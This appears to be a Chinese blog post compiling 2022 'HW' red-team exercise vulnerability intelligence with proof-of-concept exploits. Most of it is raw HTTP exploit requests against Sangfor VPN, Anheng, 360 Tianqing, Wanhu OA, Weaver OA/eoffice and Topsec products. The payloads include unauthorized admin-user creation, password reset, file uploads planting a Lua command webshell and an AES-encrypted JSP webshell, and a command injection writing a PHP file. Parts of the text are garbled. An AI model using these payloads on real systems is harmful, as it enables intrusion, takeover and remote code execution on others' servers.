【2022护网情报更新】护网最新漏洞曝光，含POC

chenqiang

原文链接：【2022护网情报更新】护网最新漏洞曝光，含POC

​
1、深信服VPN任意用户添加漏洞
漏洞等级：严重，0day漏洞
影响范围：未知
漏洞详情：用户管理接口的权限控制出现漏洞，攻击者可任意添加用户。

1. 参考POC：
   
2. POST /cgi-bin/php-cgi/html/delegatemodule/HttpHandler.php?controler=User&action=AddUser&token=e52021a4c9c962ac9cc647effddcf57242d152d9 HTTP/1.1
   
3. Host: xxxxxx
   
4. Cookie: language=zh_CN; sinfor_session_id=W730120C88755A7D932019B349CCAC63; PHPSESSID=cb12753556d734509d4092baabfb55dd; x-anti-csrf-gcs=A7DBB1DC0050737E; usermrgstate=%7B%22params%22%3A%7B%22grpid%22%3A%22-1%22%2C%22recflag%22%3A0%2C%22filter%22%3A0%7D%2C%22pageparams%22%3A%7B%22start%22%3A0%2C%22limit%22%3A25%7D%2C%22otherparams%22%3A%7B%22searchtype%22%3A0%2C%22recflag%22%3Afalse%7D%7D; hidecfg=%7B%22name%22%3Afalse%2C%22flag%22%3Afalse%2C%22note%22%3Afalse%2C%22expire%22%3Atrue%2C%22lastlogin_time%22%3Atrue%2C%22phone%22%3Atrue%2C%22allocateip%22%3Atrue%2C%22other%22%3Afalse%2C%22state%22%3Afalse%7D
   
5. Content-Length: 707
   
6. Sec-Ch-Ua: "Chromium";v="103", ".Not/A)Brand";v="99"
   
7. Content-Type: application/x-www-form-urlencoded; charset=UTF-8
   
8. X-Requested-With: XMLHttpRequest
   
9. Sec-Ch-Ua-Mobile: ?0
   
10. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    
11. Sec-Ch-Ua-Platform: "macOS"
    
12. Accept: */*
    
13. Origin: https://xxxxxx
    
14. X-Forwarded-For: 127.0.0.1
    
15. X-Originating-Ip: 127.0.0.1
    
16. X-Remote-Ip: 127.0.0.1
    
17. X-Remote-Addr: 127.0.0.1
    
18. Sec-Fetch-Site: same-origin
    
19. Sec-Fetch-Mode: cors
    
20. Sec-Fetch-Dest: empty
    
21. Referer: https://xxxxxx/html/tpl/userMgt.html?userid=0&groupid=-1&createRole=1
    
22. Accept-Encoding: gzip, deflate
    
23. Accept-Language: zh-CN,zh;q=0.9
    
24. Connection: close
    
25. 
    
26. 
    
27. name=admin1¬e=admin1&passwd=Admin%40123&passwd2=Admin%40123&phone=&grpid=-1&grptext=%2F%E9%BB%98%E8%AE%A4%E7%94%A8%E6%88%B7%E7%BB%84&selectAll=1&b_inherit_auth=1&b_inherit_grpolicy=1&is_Autoip=1&allocateip=0.0.0.0&gqsj=1&ex_time=2027-07-29&is_enable=1&is_public=1&is_pwd=1&first_psw_type=-1&second_server=&auth_type=0&ext_auth_id=&token_svr_id=%E8%AF%B7%E9%80%89%E6%8B%A9&grpolicy_id=0&grpolicytext=%E9%BB%98%E8%AE%A4%E7%AD%96%E7%95%A5%E7%BB%84&roleid=&roletext=&year=&month=&day=&isBindKey=&userid=0&crypto_key=&szcername=&caid=-1&certOpt=0&create_time=&sec_key=&first_psw_name=%E6%9C%AC%E5%9C%B0%E6%95%B0%E6%8D%AE%E5%BA%93&first_psw_id=&second_psw_name=&second_psw_id=&is_extauth=0&secondAuthArr=%5B%5D

复制代码

2、安恒数据大脑 API 网关任意密码重置漏洞
漏洞等级：严重，
可能为 0day 漏洞，目前捕获到在野的利用 POC；
影响范围：未知；
漏洞详情：在前端代码中包含重置密码的连接以及密码加密方式

1. 
   
2. POC如下：
   
3. 
   
4. 
   
5. POST /q/common-permission/public/users/forgetPassword HTTP/1.1
   
6. Host: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
   
7. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
   
8. Accept-Language: en-US,en;q=0.5
   
9. Content-type: application/json
   
10. Accept-Encoding: gzip, deflate
    
11. Connection: close
    
12. Upgrade-Insecure-Requests: 1
    
13. Content-Length: 104
    
14. {"code":XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX,"rememberMe":false,"use rname":"admin","password":"XXXXXXXXXXXXXXXXXXXXXXXXXX"}
    
15. 
    

复制代码

3、360 天擎任意文件上传
漏洞等级：严重
影响范围：未知，应该是个0day
漏洞详情：/api/client_upload_file.json 存在任意文件上传漏洞

1. 
   
2. POC如下：
   
3. 
   
4. 
   
5. POST /api/client_upload_file.json?mid=12345678901234567890123456789012&md5=123456 78901234567890123456789012&filename=../../lua/123.LUAC HTTP/1.1
   
6. Host: xxxxx
   
7. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
   
8. Content-Length: 323
   
9. Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLx7ATxHThfk91ox Q
   
10. Referer: xxxxx Accept-Encoding: gzip
    
11. ------WebKitFormBoundaryLx7ATxHThfk91oxQ
    
12. Content-Disposition: form-data; name="file"; filename="flash.php" Content-Type: application/xxxx if ngx.req.get_uri_args().cmd then cmd = ngx.req.get_uri_args().cmd local t = io.popen(cmd) local a = t:read("*all") ngx.say(a)
    
13. end------WebKitFormBoundaryLx7ATxHThfk91oxQ--

复制代码

4、万户 OA 文件上传漏洞
漏洞等级：严重
漏洞详情：/defaultroot/officeserverservlet 路径存在文件上传漏洞

1. 
   
2. POC：
   
3. POST /defaultroot/officeserverservlet HTTP/1.1
   
4. Host: XXXXXXXXX:7001
   
5. Content-Length: 782
   
6. Cache-Control: max-age=0
   
7. Upgrade-Insecure-Requests: 1
   
8. Origin: http://XXXXXXXX7001
   
9. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, li ke Gecko) Chrome/89.0.4389.114 Safari/537.36
   
10. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,imag e/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    
11. Accept-Language: zh-CN,zh;q=0.9
    
12. Cookie: OASESSIONID=CC676F4D1C584324CEFE311E71F2EA08; LocLan=zh_CN
    
13. Connection: close
    
14. DBSTEP V3.0 170 0 1000 DBSTEP=REJTVE
    
15. VQ
    
16. OPTION=U0FWRUZJTEU=
    
17. RECORDID=
    
18. isDoc=dHJ1ZQ==
    
19. moduleType=Z292ZG9jdW1lbnQ=
    
20. FILETYPE=Li4vLi4vdXBncmFkZS82LmpzcA==
    
21. 111111111111111111111111111111111111111
    
22. <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends Class Loader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.le ngth);}}%><%if (request.getMethod().equals("POST")){String k="892368804b205b83";/*man ba*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec (k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE6 4Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContex t);}%>

复制代码

DBSTEP V3.0 170 0 1000
170 是控制从报文中什么地方读取
1000 是控制 webshell 源代码内容大小


5、泛微 OA 文件上传
漏洞等级：严重
漏洞详情：/workrelate/plan/util/uploaderOperate.jsp 存在文件上传漏洞

1. 
   
2. POC：
   
3. POST /workrelate/plan/util/uploaderOperate.jsp HTTP/1.1
   
4. Host: X.X.X.X
   
5. Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101"
   
6. Sec-Ch-Ua-Mobile: ?0
   
7. Sec-Ch-Ua-Platform: "macOS"
   
8. Upgrade-Insecure-Requests: 1
   
9. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36
   
10. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/ *;q=0.8,application/signed-exchange;v=b3;q=0.9
    
11. Sec-Fetch-Site: none
    
12. Sec-Fetch-Mode: navigate
    
13. Sec-Fetch-User: ?1
    
14. Sec-Fetch-Dest: document
    
15. Accept-Encoding: gzip, deflate
    
16. Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
    
17. Connection: close
    
18. Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK
    
19. Content-Length: 393
    
20. ------WebKitFormBoundarymVk33liI64J7GQaK
    
21. Content-Disposition: form-data; name="secId"
    
22. 1
    
23. ------WebKitFormBoundarymVk33liI64J7GQaK
    
24. Content-Disposition: form-data; name="Filedata"; filename="testlog.txt"
    
25. Test
    
26. ------WebKitFormBoundarymVk33liI64J7GQaK Content-Disposition: form-data; name="plandetailid"
    
27. 1
    
28. ------WebKitFormBoundarymVk33liI64J7GQaK—

复制代码

6、泛微OA /defaultroot/officeserverservlet ：
：确认为历史漏洞；
详情：/officeserverservlet 路径文件上传





7、泛微微 eoffice10 前台 getshell（eoffice10/version.json）:
漏洞等级：严重，可能为 0day 漏洞；
漏洞详情：版本号：http://XXXXXXX:8010/eoffice10/version.json

1. <form method='post' action='http://XXXXXXXX:8010/eoffice10/server/public/iWebOffice2015/OfficeServer.php' enctype="multipart/form-data" > <input type="file" name="FileData"/></br></br> <input type="text" name="FormData" value="1"/></br></br> <button type=submit value="上传">上传</button> </form>
   

复制代码

1. POC
   
2. POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1
   
3. Host: XXXXXXXX:8010
   
4. Content-Length: 378
   
5. Cache-Control: max-age=0
   
6. Upgrade-Insecure-Requests: 1
   
7. Origin: null
   
8. Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJjb5ZAJOOXO7fwjs
   
9. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36
   
10. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/ *;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
    
11. Connection: close
    
12. ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
    
13. Content-Disposition: form-data; name="FileData"; filename="1.jpg" Content-Type: image/jpeg <?php echo md5(1);?>
    
14. ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs Content-Disposition: form-data; name="FormData" {'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'test.php'} ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs--

复制代码

8、WebLogic中间件任意命令执行漏洞
漏洞等级：严重，厂商尚未发布补丁
影响范围：未知
漏洞详情：攻击者可利用T3/IIOP接口发送恶意内容，导致任意命令执行
​编辑


​编辑
9、XxxNC前台反序列化漏洞：
漏洞等级：严重，确认为历史漏洞；
漏洞影响版本: nc 6.5；


10、Txxxb的前台未授权反序列化漏洞:
漏洞等级：严重，确认为 0day 漏洞，目前漏洞在野利用；


11、天融信天眼系统命令执行0day漏洞
漏洞等级：严重
影响范围：未知
漏洞详情：攻击者通过序列号加密要执行的攻击payload，再通过另一个未授权的接口将攻击payload上载到服务器，由服务器解密并执行此段payload，从而实现远程命令执行，获取系统服务器权限。
应急防护：
先禁止访问漏洞路径：/skyeye/home/security_service/heartbeat /skyeye/home/security_service/add_commands
检查所有安全流量监控设备是否存在对外映射，如有一律停止映射
3）添加攻击特征进行监控：/skyeye/home/security_service/heartbeat /skyeye/home/security_service/add_commands

​

12、天融信 - 上网行为管理系统 一句话木马

1. /view/IPV6/naborTable/static_convert.php?blocks[0]=||%20
   
2. echo%20%27%3C?php%20phpinfo();?%3E%27%20%3E%3E%20/var/www/html/1.php%0a

复制代码

​